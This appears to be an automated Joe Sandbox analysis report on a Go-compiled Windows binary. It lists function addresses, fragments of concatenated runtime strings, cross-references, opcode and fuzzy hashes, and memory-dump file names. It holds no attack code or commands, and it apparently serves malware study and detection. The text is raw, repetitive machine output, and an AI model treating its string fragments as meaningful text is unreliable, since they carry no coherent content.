                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= nDataRoots= nSpanRoots= pages/byte preemptoff= s.elemsize= s.sweepgen= span.limit= span.state= sysmonwait= wbuf1=<nil> wbuf2=<nil>%!(BADWIDTH)) p->status=, cons$ B exp.) B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:0$ B work ( blocked= in use) lockedg= lockedm= m->curg= marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:0024414062$ exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b$% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarMandaicM$)*+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-$+,-./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03$[controller reset]bad manualFreeListbufio: buffer fullconnection refusedfaketimeState.lockfile name too longforEachP: not donegarbage collectionidentifier removedindex out of rangeinput/output errorinvalid character multihop attemptedno child processesno locks$pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugine
                                                                                • API String ID: 0-668479763
                                                                                • Opcode ID: 8afebcaafd8969bca223d1a7623d13eee74506550c1ec6eff30ced50f8cc79c0
                                                                                • Instruction ID: 0ffd64fba5f8dfd6f26805c9e2406daf278e4937b9278100adc3e707a0678f43
                                                                                • Opcode Fuzzy Hash: 8afebcaafd8969bca223d1a7623d13eee74506550c1ec6eff30ced50f8cc79c0
                                                                                • Instruction Fuzzy Hash: 51020574908B84CFC364EF29D580B5EBBE1BF89744F518A2DE8C897352DB709845CB42
                                                                                Function 00AFD010 Relevance: 11.6, Strings: 9, Instructions: 352COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDEBUGDebugDograECDSAERRORErrorEventFATALFieldFixupGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521ParamREPRORunicSHA-1STermSize=, xrefs: 00AFD36E
                                                                                • $, xrefs: 00AFD2F9
                                                                                • value=abortedconnectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!, xrefs: 00AFD443
                                                                                • no module datano such devicepollCache.lockprotocol errorruntime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriod, xrefs: 00AFD148
                                                                                • runtime: no module data for save on system g not allowedunrecognized PE machine: %#xunreserving unaligned regionx509: invalid DSA parametersx509: invalid DSA public keyx509: invalid RSA public key45474735088646411895751953125CM_Get_Device_Interface_ListWCentra, xrefs: 00AFD114
                                                                                • pc= sp: sp=) = ) m=+Inf-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1avx2basebindbmi1bmi2boolcallcas1, xrefs: 00AFD31A
                                                                                • invalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol driver not attached : len > cap :, xrefs: 00AFD522
                                                                                • targetpc= throwing= until pc=%!(NOVERB)%!Weekday((BADINDEX), bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDispInvoke, xrefs: 00AFD344
                                                                                • runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackryuFtoaF, xrefs: 00AFD2F0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: value=abortedconnectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ status %!$ pc= sp: sp=) = ) m=+Inf-Inf.bat.cmd.com.crt.exe3125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCESTCOFFChamDashEESTFileGOGCINFOJulyJuneLEAFLTCGLisuMiaoMiscModiNB10NZDTNZSTNewaPOGORSDSSASTStatThaiTrapWARNXBOXm=] = ] n=allgallpasn1avx2basebindbmi1bmi2boolcallcas1$ tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-09301562578125<nil>AdlamAprilBamumBatakBuhidDEBUGDebugDograECDSAERRORErrorEventFATALFieldFixupGreekKhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521ParamREPRORunicSHA-1STermSize=$ targetpc= throwing= until pc=%!(NOVERB)%!Weekday((BADINDEX), bound = , limit = /dev/stdin012345678912207031256103515625AdditionalAssemblyOSBad varintC:\WindowsCancelIoExChorasmianClassCHAOSClassCSNETCreateFileCreatePipeDSA-SHA256DeprecatedDevanagariDispInvoke$$$invalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sweep: m is not lockednewproc1: new g is not Gdeadnewproc1: newg missing stackos: process already finishedprotocol driver not attached : len > cap :$no module datano such devicepollCache.lockprotocol errorruntime: full=s.allocCount= semaRoot queuestack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytime.Location(timeEndPeriod$runtime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackryuFtoaF$runtime: no module data for save on system g not allowedunrecognized PE machine: %#xunreserving unaligned regionx509: invalid DSA parametersx509: invalid DSA public keyx509: invalid RSA public key45474735088646411895751953125CM_Get_Device_Interface_ListWCentra
                                                                                • API String ID: 0-1516804383
                                                                                • Opcode ID: aa3439ca0f34fbf4acd72948918cb4d033b2aa76523c141b99d51bb3023b1606
                                                                                • Instruction ID: f3f5443625a51cb51b6d0acf81c722776f1b254d3314d5adca8d5ff9e64b05b1
                                                                                • Opcode Fuzzy Hash: aa3439ca0f34fbf4acd72948918cb4d033b2aa76523c141b99d51bb3023b1606
                                                                                • Instruction Fuzzy Hash: 74F1E0B4A097448FC314EF69D180A2EBBE1BF88714F948A2DF99987352D774E845CF42
                                                                                Function 00AB7780 Relevance: 11.4, Strings: 9, Instructions: 192COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open, xrefs: 00AB7A3E
                                                                                • pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebruaryFieldPtrFieldRVAFull, xrefs: 00AB79C7
                                                                                • ., xrefs: 00AB78C3
                                                                                • panicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat ov, xrefs: 00AB7A95
                                                                                • ./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04, xrefs: 00AB7943
                                                                                • panicwrap: unexpected string after package name: : slice of unaddressable arrayruntime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ystrings.Reader., xrefs: 00AB780D
                                                                                • value method xadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-Byt, xrefs: 00AB791E
                                                                                • called using nil *, g->atomicstatus=, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextDllUnregister, xrefs: 00AB79A1
                                                                                • panicwrap: unexpected string after type name: pkcs7: content data is a decryptable data type : slice index out of boundsreleased less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base poin, xrefs: 00AB78B9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: called using nil *, g->atomicstatus=, gp->atomicstatus=149011611938476562520060102150405Z07007450580596923828125ARM64 little endianAltai Standard TimeBahia Standard TimeCanadian_AboriginalChina Standard TimeCreateSymbolicLinkWCryptReleaseContextDllUnregister$ pointer stack=[ status %!Month(2.5.4.102.5.4.112.5.4.1748828125AcceptExArmenianAssemblyBalineseBopomofoBugineseCancelIoCherokeeClassANYCodeViewConstantCyrillicDNS nameDSA-SHA1DecemberDuployanEqualSidEthiopicEventMapEventPtrExtenderFebruaryFieldPtrFieldRVAFull$.$./05:;<=?BCMOSZ["]_`hms{} + @ P [(") )(), ->//000X0b0o0x25: ; =#> CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOUPcPdPePfPiPoPsR8R9STScSkSmSoYiZlZpZs")"\* ][]i)msnss us|0|1} G M P ) *( - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04$panicwrap: no ( in panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat ov$panicwrap: no ) in runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssysMemStat overflowtoo many open$panicwrap: unexpected string after package name: : slice of unaddressable arrayruntime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsslice bounds out of range [::%x] with capacity %ystrings.Reader.$panicwrap: unexpected string after type name: pkcs7: content data is a decryptable data type : slice index out of boundsreleased less than one physical page of memoryruntime: failed to create new OS thread (have runtime: name offset base poin$value method xadd64 failedxchg64 failed}sched={pc: but progSize nmidlelocked= on zero Value out of range procedure in to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-Byt
                                                                                • API String ID: 0-3553926922
                                                                                • Opcode ID: 7b5501674a1e3de1f3ddb7b6adb2088d646b081fd1e55af3d10cb216225f9e6b
                                                                                • Instruction ID: 67453fadb98efe73f72edc84d1450b082f9f23db9fbef836e7287216237ad44e
                                                                                • Opcode Fuzzy Hash: 7b5501674a1e3de1f3ddb7b6adb2088d646b081fd1e55af3d10cb216225f9e6b
                                                                                • Instruction Fuzzy Hash: 48919FB49083459FC328DF69C19469EBBE5BB88304F108D2EE8D987392DB749948CF53
                                                                                Function 00B06680 Relevance: 11.4, Strings: 9, Instructions: 175COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version, xrefs: 00B06799, 00B068CC
                                                                                • - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNSTNULNa, xrefs: 00B06921
                                                                                • types value=abortedconnectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ st, xrefs: 00B06839
                                                                                • not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory, xrefs: 00B067EE
                                                                                • runtime: type offset out of rangescalar has high bit set illegallyslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingstruct contains unexported fieldstimer period must be non-negativetoo many Answers to pack (>65, xrefs: 00B06955
                                                                                • out of range procedure in to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertCloseStoreCoInitializeExCoUninitializeControlS, xrefs: 00B068F7
                                                                                • base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHy, xrefs: 00B067C4
                                                                                • runtime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to pallocChunkBytesx509: failed to parse rfc822Na, xrefs: 00B068A9
                                                                                • !, xrefs: 00B0695E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E69000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646292181.0000000000E6C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646307666.0000000000E81000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_ab0000_64pOGv7k4N.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: types value=abortedconnectconsolecpuproffloat32float64forcegcgctracehead = invalidminpc= pacer: panic: readdirrunningserial:signal syscalluintptrunknownwaiting bytes, etypes is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= pointer stack=[ st$ - < > m= n=%25%: ***+00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...///125625:\/???ADTASTAprAugBSTCATCDTCETCLRCSTDSADecDltE (EATEDTEETEOFESTFPOFebFriGMTHDTHSTHanIATIDTISTJSTJanJulJunKSTLaoMD4MD5MDTMPXMSKMSTMarMayMonMroNDTNSTNULNa$ base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHebrewHy$ not in ranges: untyped locals , not a function0123456789ABCDEF0123456789abcdef2384185791015625: value of type AddDllDirectory$ out of range procedure in to finalizer untyped args -thread limit/log/filter.go/log/helper.go1907348632812595367431640625: extra text: Align 16-BytesAlign 32-BytesAlign 64-BytesBstrFromVectorCET CompatibleCertCloseStoreCoInitializeExCoUninitializeControlS$!$runtime: type offset base pointer out of rangesignal arrived during external code executionslice bounds out of range [:%x] with length %ystopTheWorld: not stopped (status != _Pgcstop)sysGrow bounds not aligned to pallocChunkBytesx509: failed to parse rfc822Na$runtime: type offset out of rangescalar has high bit set illegallyslice bounds out of range [%x:%y]stackalloc not on scheduler stackstoplockedm: inconsistent lockingstruct contains unexported fieldstimer period must be non-negativetoo many Answers to pack (>65$runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spanthread exhaustionunknown caller pcunknown type kindwait for GC cyclewine_get_version
                                                                                • API String ID: 0-3174700562
                                                                                • Opcode ID: b53462eb8e74f0cef04caff72f936b44e86b80680e8621f4098d2be2ba476435
                                                                                • Instruction ID: c46f3da45574135d952c4830d2abd8397af6f4f1e9aaca9a825b581b55d7f6af
                                                                                • Opcode Fuzzy Hash: b53462eb8e74f0cef04caff72f936b44e86b80680e8621f4098d2be2ba476435
                                                                                • Instruction Fuzzy Hash: E581F2B4909B41CFC304EF65D59575EBBE4FF88308F80896DE88887352E774D9489B52
                                                                                Function 00AD2590 Relevance: 11.4, Strings: 9, Instructions: 171COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • zombie% CPU (, Size=, goid=, j0 = 19531252.5.4.32.5.4.52.5.4.62.5.4.72.5.4.82.5.4.99765625AvestanBengaliBorlandBrailleChanDirCopySidCypriotDeseretEd25519ElbasanElymaicFreeSidGODEBUGGranthaHanunooIO waitImplMapJanuaryKannadaMD2-RSAMD5-RSAMUI_DltMUI_StdMakasarM, xrefs: 00AD27B7
                                                                                • freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=%!(BADPREC), elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b, xrefs: 00AD2611
                                                                                • (bad use of unsafe.Pointer? try -d=checkptr)PE image does not contains a COFF symbol tablebytes.Reader.UnreadByte: at beginning of sliceedwards25519: invalid field element input sizefirst path segment in URL cannot contain coloninvalid e_lfanew value. Probab, xrefs: 00AD263B
                                                                                • marked method: ms cpu, not in [ runtime= s.limit= s.state= threads= unmarked wbuf1.n= wbuf2.n=%!(EXTRA %s %q: %s(MISSING)(unknown)*invalid*, Offset=, newval=, oldval=, size = , tail = -07:00:00244140625: status=AuthorityBassa_VahBhaiksukiClassINETCuneifor, xrefs: 00AD2751
                                                                                • , elemsize=, npages = -syncWithWU/dev/stderr/dev/stdout30517578125: frame.sp=AssemblyRefBLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256BoundImportClassHESIODClassLayoutCloseHandleCoGetObjectCreateFileWDelayImportDeleteFileWDives_AkuruExitProcessFieldLayoutFreeLib, xrefs: 00AD25E7
                                                                                • ., xrefs: 00AD2644
                                                                                • runtime: marked free object in span runtime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackryuFtoaFixed64 called with prec > 18strings.Builder.Grow: negative countsyntax e, xrefs: 00AD25C5
                                                                                • alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), i = , not .reloc390625<-chanAnswerArabicAugustBrahmiCarianChakmaCommonCopticENCLogENCMapExpectExportFlags=FormatFridayGOROOTGetACPGothicHangulHatranHe, xrefs: 00AD26FF
                                                                                • found pointer to free objectgcBgMarkWorker: mode not setgcstopm: negative nmspinninginvalid P224Element encodinginvalid P384Element encodinginvalid P521Element encodinginvalid runtime symbol tablemheap.freeSpanLocked - span missing stack in shrinkstackmspan.sw, xrefs: 00AD285C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1645790758.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1645774859.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000C66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D61000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1645918326.0000000000D66000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646112196.0000000000E21000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646129589.0000000000E26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646145569.0000000000E27000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646161468.0000000000E28000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646181522.0000000000E39000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646197176.0000000000E3A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1646212559.0000000000E64000.00000004.00000001.01000000.00000003.sdmpDownload File
